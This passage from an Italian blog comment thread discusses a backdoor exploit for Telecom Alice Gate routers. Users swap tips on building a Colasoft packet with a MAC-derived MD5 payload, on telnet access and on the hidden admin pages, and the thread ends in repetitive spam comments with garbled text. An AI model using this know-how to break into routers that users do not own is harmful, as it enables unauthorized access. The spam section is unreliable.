    Non ho ancora trovato il tempo di lavorare sulla 4.3.5a (così come la 4.5.0). Se sei interessato e vuoi fare una donazione contattami per mail.

  45. Antonio // ott 12, 2009 at 17:22

    Io ho un firmware 4.5.0 e vorrei fare una prova:
    qualcuno con un firmware sbloccato (tipo il 4.3.5) ed il telnet attivo, può esportare la configurazione dall’interfaccia telecom (non dal menu avanzato) e mandarmela a [email protected]?

    Se nel file di configurazione c’è anche il flag della porta telnet, magari caricandolo sul mio mi si attiva e riesco a riguadagnare l’accesso perso con un recente aggiornamento.

  46. Mr Wolf // ott 24, 2009 at 14:40

    Mmm… cercando, qualcuno ha scoperto un’altra soluzione:
    http://gagginaspinnata.altervista.org/blog/?p=41&cpage=1#comments
    Ma… si ottiene lo stesso risultato, cioè l’accesso alle impostazioni delle firmware originale del router?
    Adesso non ce l’ho con me e non posso provare

  47. admin // ott 24, 2009 at 14:46

    no Mr Wolf,

    quello che tu indichi si riferisce ai Dialface, non hai Pirelli.
    E comunque tutte le scoperte su questi modem credo che abbiano una sola fonte: http://www.ilpuntotecnicoeadsl.com/forum (o wiki).

    Ciao

  48. Mr Wolf // ott 27, 2009 at 13:09

    Ho capito, non sapevo ci fosse un altro produttore
    La procedura che hai descritto funziona con Alice Gate 2 plus Wi-Fi AGA_3.2.6?
    Ché poi, non ho capito una cosa: al programmino di cui hai postato il link va passato il MAC del router?

  49. admin // ott 27, 2009 at 15:13

    Ciao Mr Wolf,

    è tutto scritto sopra.
    Non funziona con AGA 3.2.6.
    Devi passare al programma un file esadecimale di 6 byte con dentro il mac.

  50. snowpunk // ott 27, 2009 at 19:48

    Ciao, e complimenti.
    Volevo solo sapere se eri al lavoro per quanto riguarda il firmware AGPF_4.5.0, che è per il momento inattaccabile.

  51. vgsangiuliano // nov 2, 2009 at 09:57

    Ciao, volevo farti una domanda: per quanto riguarda il fw AGA_3.2.4 ho preso il mac address del router che però è composto da 6 serie da 2 caratteri per un totale di 12 caratteri hex. Nel file macTemplate.hex allegato insieme a MD5.EXE vedo con hexedit un totale di 14 caratteri? cosa devo fare?

  52. Alex RM // nov 9, 2009 at 16:15

    [email protected]: ti ho mandato un template del pacchetto da inviare con colasoft PB in cui cambiare solo i dati necessari: IP tuo e del modem, mac tuo e del modem, payload…

    Innanzitutto complimenti per l’exploit e per la partecipazione al meeting in Malesia. Purtroppo anche io ho problemi creando il template con colasoft, non potendo nenache prendere spunto dal template di esempio poiche’ il link non funziona.
    Domanda: potresti mandarlo anche a me via posta come hai fatto in precedenza con Fabri?
    Grazie in anticipo..

  53. Alex RM // nov 13, 2009 at 16:08

    Risolto e router aperto ;)
    Grazie mille per aver resa nota la tua tecnica di hacking “non invasiva” a tutta la comunita’ !!!
    Applauso…
    :D D

  54. ehila // nov 22, 2009 at 23:02

    ciao
    mi aggiungo alla lunga lista di complimenti per il lavoro.
    Vorrei segnalarti che non sono riuscito a scaricare il file da rapidshare.
    Trovando il sorgente da qualche altro sito non sono riuscito a compilarlo perchè mancava un md5.h valido (ne ho cercati un po’ ma non quello che serviva).
    Volevo segnalare a tutti che una volta ottenuto l’accesso in telnet si ha l’accesso all’applicazione …. non al sistema..(io non sono riuscito ad ottenerlo).
    Oltre a rinnovarti i miei complimenti mi piacerebbe sapere come sei riuscito a scoprire questo buco.

  55. ehila // nov 22, 2009 at 23:04

    Ciao
    mi aggiungo alla lunga lista di complimenti per il lavoro.
    Vorrei segnalarti che non sono riuscito a scaricare il file da rapidshare.
    Trovando il sorgente da qualche altro sito non sono riuscito a compilarlo perchè mancava un md5.h valido (ne ho cercati un po’ ma non quello che serviva).
    Lo script .sh mi piace.
    Volevo segnalare a tutti che una volta ottenuto l’accesso in telnet si ha l’accesso all’applicazione …. non al sistema..(io non sono riuscito ad ottenerlo).
    Oltre a rinnovarti i miei complimenti mi piacerebbe sapere come sei riuscito a scoprire questo buco.

  56. Giulio // nov 23, 2009 at 17:53

    Ciao e pur essendo l’ultimo complimenti per il lavoro fatto!
    Ho provato il tutto ma evidentemente sbaglio nello scrivere il payload (o qualcos’altro) in Colasoft.
    Ti chiedo cortesemente, come già fatto da altri, il template che non è più scaricabile da rapidshare.
    p.s. Dove vedo la risposta in Colasoft al pacchetto ?

    Comunque mitico !

  57. admin // nov 23, 2009 at 18:07

    COme richiesto da molti ho aggiornato il link al template del pacchetto per Colasost Packet Builder.

    Per monitorare la reazione del modem vi consiglio di usare Wireshark come sniffer di pacchetti.

    Ciao

  58. PaiMei // nov 30, 2009 at 21:12

    Ciao,
    volevo chiederti se c’è modo di disibalitare i servizi attivati con l’exploit o se le modifiche al router restano permanenti…insomma, è possibile “resettare” il router allo stato iniziale dopo aver aperto le backdoor?

  59. admin // dic 15, 2009 at 15:14

    Ciao PaiMei,

    puoi resettare il modem tenendo premuto il tasto rosso di reset presente dietro al modem per circa 20 secondi durante l’accensione.
    Oppure da telnet.

  60. Aldo // dic 17, 2009 at 22:30

    Ho seguito la procedura in questo modo:

    tramite colasoft apro il file PacketTemplate.cscpkt e modifico mac del router e quello della scheda del pc, ip router e ip pc, seleziono poi la voce extra data e sostituisco la relativa parte esadecimale selezionata con quella generata da md5.exe. Invio poi il pacchetto tramite il tasto send accettando le opzioni di default. Apro il router al 192.168.1.1 ma non è cambiato nulla. Probabilmente sbaglio qualcosa. Ho provato varie volte ma nulla non riesco. Il router è un Alice Gate 2 plus hardware L1 software AGB_3.2.4

  61. admin // dic 18, 2009 at 01:27

    @Aldo,

    prima di tutto acceratti che il pacchetto arrivi a destinazione disabilitando il firewall e l’antivirus del pc.
    POi sappi che la pagina web estesa la trovi su http://192.168.1.1/main.html.
    Su http://192.168.1.1 c’è sempre l’interfaccia telecom.

    Ciao

  62. Aldo // dic 19, 2009 at 10:56

    Sono riuscito. Ho capito dove sbagliavo. Mi ero perso il passaggio dove bisogna modificare il mac address del router nel template per generare il payload. Questo metodo è eccezionale. Auguri di buon Natale a tutti. Ciao, grazie.

  63. riccardo // dic 27, 2009 at 15:10

    ciao è stata scoperta la procedura per sbloccare agpf_4.5.0?passando a tiscali mi ritrovo in mano un router di cui non me ne faccio nulla!

  64. admin // dic 27, 2009 at 18:38

    evidentemente hai sbagliato a creare il file del payload.
    Devi usare un editor esadecimale, non un editor di testo.

    Ciao

  65. dan // gen 2, 2010 at 19:03

    ciao, ho provato a inviare il pacchetto opportunamente modificato con colasoft, ma non sono riuscito a sbloccare nulla.
    wireshark dice “Destination unreachable (Protocol unreachable)”!
    la versione del modem é AGB_3.2.4
    non capisco dove sbaglio…
    ma poi esattamente quali sono le funzionalitá che si vanno a sbloccare?

  66. Andrea // gen 10, 2010 at 13:53

    ciao… Sono riuscito a sbloccare dei modem aga2 plus seguendo questa guida. Ho che tramite telnet e tftp server è possibile aggiornare il firmware. (cosa che prima o poi farò). Prima di fare questo ho notato che sempre tramite tftp è possibile scaricare la configurazione del router relativa hai dati cliente. Mi chiedevo se era possibile, modificando opportunamente i dati cliente, far andare questi modem su altro ISP(tiscali, infostrada etc etc…) senza aggiornare firmaware?
    Io ho fatto quache prova senza raggiungere un buon esito scaricando il backup e modificando, con notepad, solo userID e pass… Secondo voi è una cosa fattibile? Qualcuno ha avuto un buon esito?

  67. bari1 // gen 17, 2010 at 09:59

    colsasoft non mi vede la skeda di rete;ho windows 7 64 bit e sto cercando di sbrandizzare un Alice Business Gate Sw: AB_1.2.1 Fw: 3.46
    consigli?
    ciao.

  68. bari1 // gen 17, 2010 at 19:39

    Ho risolto il problema di colasoft;
    non ho capito come iniettare il file modificato, payload?
    come si costruisce e dove si mette?non si capisce bene nella guida;
    ho usato il template scaricato da saxdax, boh…
    qualcuno mi aiuta?

  69. omeroenzo // feb 2, 2010 at 09:00

    ciao io ne ho uno con firmware AGPF_4.3.5a

  70. Simone // feb 11, 2010 at 11:01

    Salve, vorrei sapere se con questa procedura il modem passa da bridge a router, io ho un AGPF_4.3.2, il mio problema è che se navigo con la LAN non riesco ad accedere con un altro computer tramite WiFi, mentre se ne collego più di uno in LAN vanno… Stessa cosa se non collego nessun PC in LAN e li connetto tutti in WiFi… Mi risolverà questo problema?

    Grazie.

  71. Lorenzo // feb 11, 2010 at 17:46

    Salve, scrivo solo per farle i miei complimenti per la soluzione software trovata.
    Ho adottato con successo la sua tecnica per poter gestire un tale router da remoto.
    Grazie.

  72. XPT // feb 14, 2010 at 20:00

    Grazie, ha funzionato perfettamente! Finalmente posso usarlo in modalita’ router.

  73. admin // feb 17, 2010 at 14:40

    @Andrea
    si può utilizzare con altri operatori. Ti rimando al forum del puntotecnico per i dettagli.

    @bari1
    sarebbe utile per gli altri descrivere come hai risolto il problema con Windows 7.

    @Simone
    sì risolverai qeusto problema.

    @Lorenzo, @XPT
    non possono ch efare piacer5e questio tipo di messaggi.
    Grazie

  74. ale // feb 19, 2010 at 10:32

    sto provando questo e anche il ponticello sull’hardware per AGA_3.2.6 ma come ben detto da voi non va. avete qlc link a qlc thread in cui si stia provando ad aggiarlo? voglio trasformare Alice Gate in un access point e basta :)

    grazie

  75. admin // feb 19, 2010 at 12:28

    l’AGA è sbloccabile ormai in 10 modi diversi da anni.
    Se non riesci con questo metodo vai sul puntetecnicoeadsl e troverai tutte le guide che vuoi.

    Ciao

  76. ale // feb 19, 2010 at 13:45

    eh navigato a destra e amanca ma si dice sempre che con 3.2.6 non c’è niente da fare, almeno per la backdoor software. mah ripriverò con il ponticello…

  77. ale // feb 20, 2010 at 14:56

    aggiornamento: ho raccolto opinioni qui e li’ e salta fuori che <>

    ora NON HO AVUTO SUCCESSO IN ALCUN MODO…ho ponticellato che sembrava avessi il parkinson ma niente.

    a sto punto mi vien da temere hce abbiano abbassato ulteriormente il timeout o che l’abbiano tolto. mi toccherà ataccarmi in seriale per vedere cosa succede ma devo recuperare il cavo maschio RS232…ufff…

    non ci sono ivnece novità sul fronte hacking software?

  78. ale // feb 20, 2010 at 14:57

    scusate non mi aveva preso il pezzo citato: La difficolta` del ponticello non e’ il contatto tra le due piazzole, ma cogliere il momento giusto. Mi spiego maglio, se hai una seriale, puoi vedere che dopo pochi secondi compare una scritta che dice, premere un tasto per bloccare il boot e qui interviene il ponticello.

  79. ale // feb 20, 2010 at 18:31

    grazie mille!!! mi sono fatto una forchettina e comincio a striscisare PRIMA di accedere. poi con l’altra mano accendo e il led va rosso. ho già caricato il nuovo firmare grazie!

    si ha MENO di un secondo dall’accensione per farlo

  80. Lino // mar 12, 2010 at 17:05

    Salve, premettendo che di modem ruter non ci capisco nulla, per il agpf_4.5.0sx è uscito nulla per sboccarlo, sinceramente con tutto quello che ho letto in questi giorni a riguardo, sono andato nel pallone^^

    vi rimgrazio

  81. Fabio // mar 19, 2010 at 12:07

    Ciao complimenti per la guida e il metodo, io però non riesco a capire come si crea il payload, mi puoi dare un aiuto passo a passo per favore?Grazie comunque in anticipo la mia mail è [email protected]

  82. davide // mag 9, 2010 at 22:29

    ciao,
    hoseguito tutti i passsaggi della tua guida ma non ottengo nessun risultato. spedito il pacchetto colasoft postatto da te dopo aver inserito indirirro ip e mac del modem e del pirelli e con la payloads ma nulla

    sto rincretinendo

    aitutooooooooooo

  83. vgsangiuliano // mag 14, 2010 at 09:33

    Ciao per la risoluzione del problema che si ha con windows 7 e colasoft che non trova il network adapter basta semplicemente eseguire colasoft come amministratore.

  84. giovanni // mag 15, 2010 at 06:46

    Ciao io ho il fw AGA_3.2.6? E’ stato trovato un modo per sbloccarlo?
    In caso contrario che procedura posso eseguire?
    grazie

  85. aterys // mag 21, 2010 at 01:57

    Ciao saxdax, complimenti per il lavoro svolto.
    Ho un Pirelli Vela, AG3 3.2.4, ho provato ad utilizzare il metodo della backdoor, sia da Windows che da Linux, ma senza successo.
    Ho generato il payload da un file esadecimale contenente il mac riportato sotto al router, ho provato sia compilando il sorgente che con entrambi gli exe compilati da te. Ho inviato il pacchetto sia utlizzando il tuo templateper Colasoft (cambiando ovviamente MACs, IPs e payload) sia con packeth (sotto linux), ma il router non si sblocca.
    Non capisco dove sbaglio, puoi darmi una mano per favore?
    Grazie mille.

  86. webmad // giu 1, 2010 at 01:58

    Siete grandissimi, ho un router con fw AGB 3.2.4 sbloccato in un attimo!

  87. Nevermore // giu 11, 2010 at 22:03

    Mi accodo a coloro i quali interessa sapere se sono disponibili metodi per lo sblocco di S1 AGPF_4.5.0sx

  88. admin // giu 12, 2010 at 19:45

    @Nevermore

    contattami per mail.
    Il metodo è lo stesso ma il payload posso fornirtelo io.

    Ciao

  89. Giustiniano // giu 19, 2010 at 00:26

    @admin
    Dai, non fare il taccagno, condividi TUTTO per benino e buonanotte al secchio !

    Con il magnifico exploit che hai creato, tantissima gente potrebbe pararsi il culo cambiandosi il SSID.

    Non ti basta la gloria?

    Ciao.

  90. Andrea // lug 2, 2010 at 21:19

    Grazie!! Potete dirmi le stringhe che vanno modificate, con quali valori e dove si trovano per riportare il modem (AGB 3.2.4) come era per piacere? (visto che ho la telegestione attivata e non vorrei che mi facessero storie..)

    P.S.: Qualcuno ha mai provato ad installare debian e tipo rtorrent sull’AGB? E’ possibile? C’è qualche guida passo passo per l’AGB?

    Grazie all’admin per questa fantastica procedura e grazie a tutti quelli che risponderanno alle mie domande

  91. cal85 // lug 30, 2010 at 19:44

    ciao Volevo sapere se un AGIA può diventare
    agpf \agif ? come fare ?

  92. CAL_85 // ago 2, 2010 at 04:56

    Ciao ,
    volevo sapere se su un Agia è possibile cambiare firmware e e caricare un Agpf !
    grazie .

  93. youbit // ago 4, 2010 at 04:17

    salve ,
    anche io sarei interessato sul cambio Firmware
    della serie AGIA

  94. Giuseppe // ago 9, 2010 at 19:39

    Buonasera,

    ho inviato una mail riguardo lo sblocco di un AGB 3.2.4. Spero che le sia arrivata e che sia possibile aiutarmi.

    Grazie in anticipo!

  95. Valerio // ago 15, 2010 at 07:59

    Ciao.
    Io ho un Alice 2 plus AGA_3.2.6.
    Ho seguito alla lettera le tue indicazioni ma non sono riuscito ad ottenere il risultato che speravo.
    Se ti mando il mac-address del router mi confermi che sia corretto il payload che ho ottenuto?

    Graazie 1000.
    Ciao.
    Valerio

  96. eda // set 7, 2010 at 09:55

    Salve ho un modem alice gate voip plus wi-fi AGPF_4.5.0 lo voglio far connettere con gli altri gestori .Si può sbloccare ???’potette aiutarmi ??? grazie

  97. Luciano // set 8, 2010 at 14:13

    Sono nella stessa sitiuazione di Valerio….vale la stessa richiesta….
    grazieeeee!

  98. litodanie // ott 7, 2010 at 19:59

    Ringrazio saxdax sia per la guida che per avermi suggerito il payload giusto in pvt! ;-) Avevo infatti sbagliato ricavandolo dal programma presente nel pack di megaupload mentre invece avrei dovuto ricavarlo dal primo link (sbadato!)
    Ho l’Alice vela e da qualche giorno sono passato a infostrada, adesso cosa devo abilitare per avere la connessione automatica senza l’acesso tramite una connessione a banda larga?

  99. sacetto // ott 19, 2010 at 13:49

    purtroppo per la versione aga 3.2.6 non funziona

  100. Giorgio // ott 21, 2010 at 10:24

    Ciao Saxdax,
    ho un AGPF_4.5.0sx che non ne vuol sapere con tutti i metodi sw trovati sul web (peraltro riferiti a versioni precedenti…)
    Per il tuo metodo mi mancano due informazioni:
    – come ricavare il payload per la mia versione
    – quale MAC usare. Da quel che vedo dal file .kry di config, il mio “scatolo” ha un unico MAC che poi coincide con quanto riportato sull’etichetta sotto.
    Anche ARP per 192.168.1.1 mi da lo stesso MAC: possibile che abbia lo stesso indirizzo per tutte le interfacce?

    Ti ringrazio anticipatamente per le info e per il lavoro pubblicato!
    Ciao
    Giorgio

  101. FrancYescO // ott 22, 2010 at 10:59

    e mettendo caso io abbia un AGIF_1.2.1 hardware F9 …. mi attacco??

  102. Gaetano // nov 9, 2010 at 16:45

    ciao ragazzi, davvero interessantissima questa guida! volevo chiedervi se con questa procedura è possibile caricare un firmware custom perchè mi serve per accendere e spegnere il wifi dal tasto reg. grazie mille

  103. Erny // nov 11, 2010 at 19:59

    Ciao ho un modem alice gate voip plus wi-fi AGPF_4.5.0 lo voglio far connettere con gli altri gestori (infostrada) .Si può sbloccare ???’potette aiutarmi ??? grazie
    é possibile anche dividere la banda sugli IP?

  104. achillealb // dic 3, 2010 at 10:01

    Ciao Saxdax,
    ho un AGPF_4.5.0sx che non riesco sbloccare con il metodo del ponticello
    come devo fare???
    lo voglio far connettere con gli altri gestori teletu
    grazie

  105. rnhmjoj // dic 4, 2010 at 15:33

    Ciao, ho un problema.
    non riesco a capire cosa devo fare con il generatore che ha fatto e con il file hex.
    Io ho messo il mac del router nel file hex e l’ho aperto nel programma.
    Mi da la stringa e poi non so cosa fare. Devo convertirla in esadecimale ?
    Cosa sbaglio. Mi puoi rispondere, grazie.

  106. Trippa // dic 10, 2010 at 18:36

    Ciao, ho un modem alice wifi recuperato (nel senso che abbiamo cambiato provider ma ci è rimasta la macchinetta pagata profumatamente) che vorrei usare per collegarmi wifi. il fatto è che mi chiede una password… un amico mi ha suggerito di mettere in rete il mio router e questo.
    Insomma non riesco a far funzionare niente. Mi puoi aiutare? Grazieeee

    P.S. Uso un macintosh…

  107. tapiro73 // feb 17, 2011 at 20:16

    Sono disponibili metodi per lo sblocco del router software AGPF_4.5.2 hardware L1.

    Grazie

  108. cenzo85 // mar 5, 2011 at 17:42

    ma io ho un AGIF_1.2.1 con hardware F10…
    ….come posso fare ?

  109. ponticellare? // mar 8, 2011 at 11:13

    ragà che significa ponticellare?

  110. alessio // mar 8, 2011 at 12:21

    anche io ho un AGIF_1.2.1 con HW F9 ma non c’è niente da fare?

  111. Vincenzo // mar 11, 2011 at 08:12

    Ciao a tutti! Ho provato a seguire la guida descritta sù, ma mi blocco ad un passaggio: dentro Colasfot Packet Builder, che valore esadecimale devo inserire? E dove soprattutto? Non ci sono riusctito! Qualcuno mi aiuti per piacere! Ho il modem “Vela” con firmware AG3_3.2.4. Grazie 1000!

  112. Gabriele // mar 28, 2011 at 07:18

    Ciao, io ho un modem alice gate 2 plus (non wi-fi) Pirelli con firmware AGB_3.2.4, come devo fare per procedere allo sblocco?

    Ho scaricato quel programmino da rapidshare, ma non ci ho capito nulla…

    Se sereste così gentili da inviarmi la procedura tramite email ve ne sarei molto grato…

    P.s.: sono abbastanza ignorante in materia

  113. Flavio // apr 27, 2011 at 20:19

    Ciao, ho letto l’articolo con curiosità e ho provato con successo la procedura su di un router alice, complimenti!! ;)
    Vorrei sapere se la stessa procedura si può applicare su un router della Asus con chipset Broadcom BCM96348 appunto, non so se sbaglio io qsa oppure non è applicabile a questo router. Ciao e grazie :)

  114. mirko // mag 20, 2011 at 16:18

    @ Alessio: ho anch’io un AGIF_1.2.1 F9 e sono riuscito a sbloccarlo seguendo le guide su forum.zibri.org
    Purtroppo bisogna aprire il modem e collegarsi sui pin della seriale per poter effettuare la procedura, ma ne vale la pena.

  115. Mathley // mag 31, 2011 at 20:17

    Ho eseguito la procedura per il packet injection come descritto da voi con successo su un Alice gate AGPF 4.5.0sx. Sono riuscito ad entrare tramite Telnet e sbloccato la pagina di amministrazione. Il link alla pagina http://192.168.1.1/admin.html è di login (Pirelli). Ho provato svariate combinazioni di username & password ma ogni volta mi reindirizza all’index del router. Devo fare quanche altra operazione? Consigli?
    Grazie in anticipo per le eventuali risposte.

  116. Mathley // giu 8, 2011 at 10:54

    Problema risolto.
    C’è un bug nella pagina (o nel mio router). Occorre reinserire i dati di autenticazione 2 volte. La prima volta mi rimanda sempre all’index a prescindere da cosa inserisco nei campi.
    La seconda volta entra correttamente nel menu avanzato.

  117. clemenzem clemenzem // giu 12, 2011 at 00:05

    buongiorno, vorrei aiuto da parte vostra e grazie prima, ho modem alice business gate 2plus e adsl tiscali e vorrei sbloccare il modem per farlo funzionare con tiscali…mi potete aiutare….grazie 10000000000!

  118. Roby // giu 29, 2011 at 14:58

    ciao. Possiedo il nuovo router ALICE WIFI N distribiuto da telecom da circa 2 mesi, qualcuno sa come modificarlo per usarlo con infostrada? Grazie

  119. Fabrizio // lug 30, 2011 at 12:10

    Ciao,
    ho letto con attenzione domande e risposte di questo forum ma credo non ci sia la risposta ad un mio quesito: c’è modo di far funzionare Fritz!Box 7390 su linea Flat Alice casa con voip senza usare il modem Alice gate Voip2 Plus Wi-Fi (Pirelli)? Non ho premesso che Fritz collegato in cascata con Alice Gate funziona ma, dato che vorrei sfruttare le sue funzionalità sulla telefonia, non mi permette di settare adeguatamente le chiamate in entrata sulla mia linea di casa.
    Mi rivolgo a voi vista la lunghissima lista di complimenti meritati e soprattutto per la competenza tecnica dimostrata. Potete aiutarmi? Grazie

  120. SASA // set 16, 2011 at 15:53

    Ciao volevo un chiarimento…
    Ho il modem alicegate 2 plus wifi, e sto cercando di passare a infostrada, per cui mi interessa sapere se con la versione software 4.5.0sx potrò connettere tutti i pc di casa al modem senza problemi.
    Ho saputo che con infostrada usando il modem alice c’è il vincolo di un pc connesso!!!
    ti ringrazio e a presto

  121. paolof. // set 21, 2011 at 14:01

    salve complimenti per la guida… voi si che ci date dentro

    cmq veniamo al dunque sono riuscito ad entrare nel discus del “router” ma non riesco ad entrare nella pagina web di configurazione. da cosa puo dipendere?

  122. Paolo // set 27, 2011 at 21:52

    Ciao!

    veramente molto interessante!

    iente in vista per i firmware AGPF 4.5.2?

    Grazie in anticipo,

    Paolo

  123. Luca da Verona // dic 15, 2011 at 02:55

    Ciao a tutti,
    qualche anno fa ho fatto la modifica con backdoor al pirelli vela ( alice gate w2+ ).
    Tutto era andato a buon fine, riuscivo a vedere il menu avanzato al seguente indirizzo:
    http://192.168.1.1/admin.html
    UN giorno però cambiai la password di suddetto router, e me la segnai su un foglio.
    Ho perso il foglio purtroppo, e non riesco più a ad accedere al menu avanzato ( il mio obiettivo è quello di riuscire ad attivare controllo accesso e crittografia wep contemporaneamente, ma purtroppo dal menu normale 192.168.1.1 non si riesce, o tengo uno, o tengo l’altro).
    La mia domanda è?
    Esiste un metodo per recuperare la password o resettarla al valore di default “admin”?
    Rifacendo la procedura di sblocco tramite backdoor si resetta la password?

    Esiste un escamotage per evitare tutto questo e riuscire a tenere accesi “controllo accesso ” e “crittografia wep” contemporaneamente?
    PS: il router è della telecom quindi vorrei evitare di strappare le etichette per apire il router e sbloccarlo con il metodo del ponticello, onde evitare di perdere la garanzia.

    Fatemi sapere.

    Grazie mille

  124. Raul // dic 26, 2011 at 18:56

    Salve, io ho un problema non riesco più ad accedere in wi-fi al router di alice admin e la password (la password non la conosco). admin admin non funziona . Quindi riesco a connettermi al router 192.168.1.1 e poi non riesco ad auteticarmi sempre e solo in wi-fi. Mi raccomando di non rispondermi che devo digitare il reset (NON POSSO . ) . Datemi notizie Grazie

  125. WALLACE // lug 20, 2012 at 01:24


    Buy Viagra

    Check Quality Generic Pills Today!…

  126. roland // dic 22, 2013 at 13:22

    [email protected]” rel=”nofollow”>.…

    спс!…

  127. Frank // dic 23, 2013 at 05:33

    [email protected]” rel=”nofollow”>.…

    спасибо….

  128. scott // dic 23, 2013 at 08:58

    [email protected]” rel=”nofollow”>.…

    good info!…

  129. Armando // dic 23, 2013 at 12:33

    [email protected]” rel=”nofollow”>.…

    спс….

  130. tommy // gen 19, 2014 at 02:45

    [email protected]” rel=”nofollow”>.…

    good….

  131. craig // gen 19, 2014 at 02:58

    [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  132. Fred // gen 19, 2014 at 04:52

    [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  133. ernest // gen 19, 2014 at 05:45

    [email protected]” rel=”nofollow”>.…

    thank you….

  134. Bob // gen 19, 2014 at 06:30

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  135. Darren // gen 19, 2014 at 07:13

    [email protected]” rel=”nofollow”>.…

    hello….

  136. Glenn // gen 19, 2014 at 09:16

    [email protected]” rel=”nofollow”>.…

    thank you!…

  137. gerard // gen 19, 2014 at 10:44

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  138. glen // gen 19, 2014 at 10:58

    [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  139. bryan // gen 19, 2014 at 11:11

    [email protected]” rel=”nofollow”>.…

    good info!…

  140. darryl // gen 19, 2014 at 11:48

    [email protected]” rel=”nofollow”>.…

    thanks….

  141. rick // gen 19, 2014 at 12:50

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  142. Edward // gen 19, 2014 at 13:22

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî….

  143. Kyle // gen 19, 2014 at 13:50

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  144. dustin // gen 19, 2014 at 16:05

    [email protected]” rel=”nofollow”>.…

    good….

  145. ernest // gen 19, 2014 at 16:55

    [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!!…

  146. Lawrence // gen 19, 2014 at 17:39

    [email protected]” rel=”nofollow”>.…

    ñïñ!…

  147. Adrian // gen 19, 2014 at 23:01

    [email protected]” rel=”nofollow”>.…

    good!…

  148. Joseph // gen 20, 2014 at 00:13

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  149. stuart // gen 20, 2014 at 01:06

    [email protected]” rel=”nofollow”>.…

    tnx for info….

  150. Matt // gen 20, 2014 at 02:02

    [email protected]” rel=”nofollow”>.…

    ñïñ….

  151. brian // gen 20, 2014 at 04:22

    [email protected]” rel=”nofollow”>.…

    tnx!…

  152. Clayton // gen 20, 2014 at 04:47

    [email protected]” rel=”nofollow”>.…

    hello!…

  153. Jared // gen 20, 2014 at 05:44

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  154. hugh // gen 20, 2014 at 06:21

    [email protected]” rel=”nofollow”>.…

    good info!!…

  155. marvin // gen 20, 2014 at 07:58

    [email protected]” rel=”nofollow”>.…

    good info!…

  156. ian // gen 20, 2014 at 10:08

    [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  157. joel // gen 20, 2014 at 12:31

    [email protected]” rel=”nofollow”>.…

    thank you!…

  158. Cecil // gen 20, 2014 at 15:01

    [email protected]” rel=”nofollow”>.…

    hello!…

  159. Herbert // gen 20, 2014 at 15:14

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  160. glen // gen 20, 2014 at 16:08

    [email protected]” rel=”nofollow”>.…

    tnx!…

  161. brent // gen 20, 2014 at 16:33

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ….

  162. john // gen 20, 2014 at 17:31

    [email protected]” rel=”nofollow”>.…

    ñïñ….

  163. Edgar // gen 20, 2014 at 19:24

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  164. antonio // gen 20, 2014 at 19:38

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  165. Everett // gen 20, 2014 at 20:12

    [email protected]” rel=”nofollow”>.…

    ñïñ….

  166. jack // gen 20, 2014 at 20:39

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!…

  167. Rene // gen 20, 2014 at 22:06

    [email protected]” rel=”nofollow”>.…

    good info!…

  168. dennis // gen 20, 2014 at 22:28

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  169. Alan // gen 21, 2014 at 01:33

    [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  170. don // gen 21, 2014 at 01:45

    [email protected]” rel=”nofollow”>.…

    tnx!…

  171. mario // gen 21, 2014 at 02:00

    [email protected]” rel=”nofollow”>.…

    ñïñ!…

  172. edwin // gen 21, 2014 at 02:12

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ!…

  173. Dwayne // gen 21, 2014 at 03:49

    [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  174. harold // gen 21, 2014 at 04:47

    [email protected]” rel=”nofollow”>.…

    hello!!…

  175. Raymond // gen 21, 2014 at 05:15

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  176. Matt // gen 21, 2014 at 06:10

    [email protected]” rel=”nofollow”>.…

    ñïñ!…

  177. Peter // gen 21, 2014 at 06:15

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  178. walter // gen 21, 2014 at 06:55

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!…

  179. Gerald // gen 21, 2014 at 10:17

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  180. ramon // gen 21, 2014 at 10:28

    [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  181. Marcus // gen 21, 2014 at 11:41

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  182. Bruce // gen 21, 2014 at 11:47

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  183. Terrance // gen 21, 2014 at 12:18

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí….

  184. Everett // gen 21, 2014 at 12:31

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  185. Joshua // feb 9, 2014 at 16:21

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  186. Douglas // feb 9, 2014 at 17:57

    [email protected]” rel=”nofollow”>.…

    ñïñ!…

  187. thomas // feb 9, 2014 at 22:47

    [email protected]” rel=”nofollow”>.…

    good info!!…

  188. Randall // feb 9, 2014 at 23:08

    [email protected]” rel=”nofollow”>.…

    good info!…

  189. carlos // feb 9, 2014 at 23:52

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  190. jackie // feb 10, 2014 at 00:09

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  191. Oliver // feb 10, 2014 at 03:16

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ!…

  192. Wendell // feb 10, 2014 at 05:03

    [email protected]” rel=”nofollow”>.…

    tnx for info….

